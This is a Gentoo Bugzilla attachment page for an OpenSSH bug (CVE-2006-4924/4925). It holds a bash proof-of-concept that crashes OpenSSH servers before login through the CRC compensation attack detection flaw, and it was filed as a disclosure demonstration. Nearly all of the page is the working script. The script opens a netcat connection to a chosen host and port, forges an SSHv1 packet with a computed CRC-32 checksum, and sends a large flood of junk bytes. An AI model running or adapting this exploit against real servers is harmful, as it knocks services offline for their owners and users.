Go to:
Gentoo Home
Documentation
Forums
Lists
Bugs
Planet
Store
Wiki
Get Gentoo!
Gentoo's Bugzilla – Attachment 97942 Details for
Bug 148228
net-misc/openssh Multiple minor issues CVE-2006-4924 CVE-2006-4925
Home
|
New
–
[Ex]
|
Browse
|
Search
|
Privacy Policy
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
demonstration exploit
openssh-exploit.sh (text/plain), 4.86 KB, created by
Tavis Ormandy (RETIRED)
on 2006-09-24 07:13:20 UTC
(
hide
)
Description:
demonstration exploit
Filename:
MIME Type:
Creator:
Tavis Ormandy (RETIRED)
Created:
2006-09-24 07:13:20 UTC
Size:
4.86 KB
patch
obsolete
>#!/bin/bash ># ># OpenSSH CRC compensation attack detection DoS PoC. ># Tavis Ormandy <taviso@google.com> ># ># Yes, I really did implement crc-32 in bash. ># ># usage: script <hostname> > ># victim hostname >hostname=${1:-localhost} >port=${2:-22} > ># where the fifo is created to communicate with netcat >fifo=/tmp/nc.$$ > ># make the fifos >mkfifo ${fifo}.in >mkfifo ${fifo}.out > ># pre-calculated crc32 for packet header >declare -i crc=0xb2240279 > ># crc lookup table >declare -a crc32tab=( 0x00000000 0x77073096 0xee0e612c 0x990951ba 0x076dc419 > 0x706af48f 0xe963a535 0x9e6495a3 0x0edb8832 0x79dcb8a4 0xe0d5e91e 0x97d2d988 > 0x09b64c2b 0x7eb17cbd 0xe7b82d07 0x90bf1d91 0x1db71064 0x6ab020f2 0xf3b97148 > 0x84be41de 0x1adad47d 0x6ddde4eb 0xf4d4b551 0x83d385c7 0x136c9856 0x646ba8c0 > 0xfd62f97a 0x8a65c9ec 0x14015c4f 0x63066cd9 0xfa0f3d63 0x8d080df5 0x3b6e20c8 > 0x4c69105e 0xd56041e4 0xa2677172 0x3c03e4d1 0x4b04d447 0xd20d85fd 0xa50ab56b > 0x35b5a8fa 0x42b2986c 0xdbbbc9d6 0xacbcf940 0x32d86ce3 0x45df5c75 0xdcd60dcf > 0xabd13d59 0x26d930ac 0x51de003a 0xc8d75180 0xbfd06116 0x21b4f4b5 0x56b3c423 > 0xcfba9599 0xb8bda50f 0x2802b89e 0x5f058808 0xc60cd9b2 0xb10be924 0x2f6f7c87 > 0x58684c11 0xc1611dab 0xb6662d3d 0x76dc4190 0x01db7106 0x98d220bc 0xefd5102a > 0x71b18589 0x06b6b51f 0x9fbfe4a5 0xe8b8d433 0x7807c9a2 0x0f00f934 0x9609a88e > 0xe10e9818 0x7f6a0dbb 0x086d3d2d 0x91646c97 0xe6635c01 0x6b6b51f4 0x1c6c6162 > 0x856530d8 0xf262004e 0x6c0695ed 0x1b01a57b 0x8208f4c1 0xf50fc457 0x65b0d9c6 > 0x12b7e950 0x8bbeb8ea 0xfcb9887c 0x62dd1ddf 0x15da2d49 0x8cd37cf3 0xfbd44c65 > 0x4db26158 0x3ab551ce 0xa3bc0074 0xd4bb30e2 0x4adfa541 0x3dd895d7 0xa4d1c46d > 0xd3d6f4fb 0x4369e96a 0x346ed9fc 0xad678846 0xda60b8d0 0x44042d73 0x33031de5 > 0xaa0a4c5f 0xdd0d7cc9 0x5005713c 0x270241aa 0xbe0b1010 0xc90c2086 0x5768b525 > 0x206f85b3 0xb966d409 0xce61e49f 0x5edef90e 0x29d9c998 0xb0d09822 0xc7d7a8b4 > 0x59b33d17 0x2eb40d81 0xb7bd5c3b 0xc0ba6cad 0xedb88320 0x9abfb3b6 0x03b6e20c > 0x74b1d29a 0xead54739 0x9dd277af 0x04db2615 0x73dc1683 0xe3630b12 0x94643b84 > 0x0d6d6a3e 0x7a6a5aa8 0xe40ecf0b 0x9309ff9d 0x0a00ae27 0x7d079eb1 0xf00f9344 > 0x8708a3d2 0x1e01f268 0x6906c2fe 0xf762575d 0x806567cb 0x196c3671 0x6e6b06e7 > 0xfed41b76 0x89d32be0 0x10da7a5a 0x67dd4acc 0xf9b9df6f 0x8ebeeff9 0x17b7be43 > 0x60b08ed5 0xd6d6a3e8 0xa1d1937e 0x38d8c2c4 0x4fdff252 0xd1bb67f1 0xa6bc5767 > 0x3fb506dd 0x48b2364b 0xd80d2bda 0xaf0a1b4c 0x36034af6 0x41047a60 0xdf60efc3 > 0xa867df55 0x316e8eef 0x4669be79 0xcb61b38c 0xbc66831a 0x256fd2a0 0x5268e236 > 0xcc0c7795 0xbb0b4703 0x220216b9 0x5505262f 0xc5ba3bbe 0xb2bd0b28 0x2bb45a92 > 0x5cb36a04 0xc2d7ffa7 0xb5d0cf31 0x2cd99e8b 0x5bdeae1d 0x9b64c2b0 0xec63f226 > 0x756aa39c 0x026d930a 0x9c0906a9 0xeb0e363f 0x72076785 0x05005713 0x95bf4a82 > 0xe2b87a14 0x7bb12bae 0x0cb61b38 0x92d28e9b 0xe5d5be0d 0x7cdcefb7 0x0bdbdf21 > 0x86d3d2d4 0xf1d4e242 0x68ddb3f8 0x1fda836e 0x81be16cd 0xf6b9265b 0x6fb077e1 > 0x18b74777 0x88085ae6 0xff0f6a70 0x66063bca 0x11010b5c 0x8f659eff 0xf862ae69 > 0x616bffd3 0x166ccf45 0xa00ae278 0xd70dd2ee 0x4e048354 0x3903b3c2 0xa7672661 > 0xd06016f7 0x4969474d 0x3e6e77db 0xaed16a4a 0xd9d65adc 0x40df0b66 0x37d83bf0 > 0xa9bcae53 0xdebb9ec5 0x47b2cf7f 0x30b5ffe9 0xbdbdf21c 0xcabac28a 0x53b39330 > 0x24b4a3a6 0xbad03605 0xcdd70693 0x54de5729 0x23d967bf 0xb3667a2e 0xc4614ab8 > 0x5d681b02 0x2a6f2b94 0xb40bbe37 0xc30c8ea1 0x5a05df1b 0x2d02ef8d ); > >printf "[*] OpenSSH Pre-Auth DoS PoC by taviso@google.com\n" >&2 >printf "[*] Attacking %s...\n" $hostname >&2 > ># launch netcat coprocess >(nc -q0 $hostname $port < $fifo.in > $fifo.out; rm -f $fifo.in $fifo.out) & > ># open file descriptors to coprocess >exec 3>${fifo}.in 4<${fifo}.out > ># send identification >printf "SSH-1.8-OpenSSH DoS Demo -- taviso@google.com\n" >&3 > ># read server key and spoof bytes (i only care about the spoof bytes) >read server_identification <&4 >printf "[*] remote server identifies as %s.\n" "${server_identification}" >&2 > ># read the cookie >cookie="$(hexdump -n 18 -e '"" 8/1 "%02x " " "'<&4 | cut -d" " -f11-18)" > >printf "[*] IP spoofing cookie was %s.\n" "${cookie}" >&2 > ># now send my response >printf "\x00\x00\x08\x3d" >&3 # packet length >printf "\x00\x00\x00\x03" >&3 # packet type >printf "\x03" >&3 # cipher type > ># print spoof bytes >printf "\x${cookie// /\x}" >&3 > ># now calculate checksum of spoof bytes >for i in ${cookie}; do > declare -i buf=0x${i} > let 'crc = crc32tab[(crc ^ buf) & 0xff] ^ (crc >> 8)' >done > ># now send some random crap for padding. >for ((i = 0; i < 2095; i++)); do > printf "\x41" >&3 > let 'crc = crc32tab[(crc ^ 0x41) & 0xff] ^ (crc >> 8)' >done > >printf "[*] checksum should be %#x\n" $crc >&2 > ># now send the checksum to server >printf "$(printf "\\\x%x\\\x%x\\\x%x\\\x%x" $(((crc >> 24) & 0xff)) \ > $(((crc >> 16) & 0xff)) \ > $(((crc >> 8) & 0xff)) \ > $(((crc >> 0) & 0xff)))" >&3 > >printf "\x00\x03\xff\xf8" >&3 # packet length > ># junk >perl -e 'print "\x00"x"262144"' >&3 > ># close file descriptors >exec 3>&- 4<&- > >printf "[*] All done.\n" >&2
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 148228
:
97507
| 97942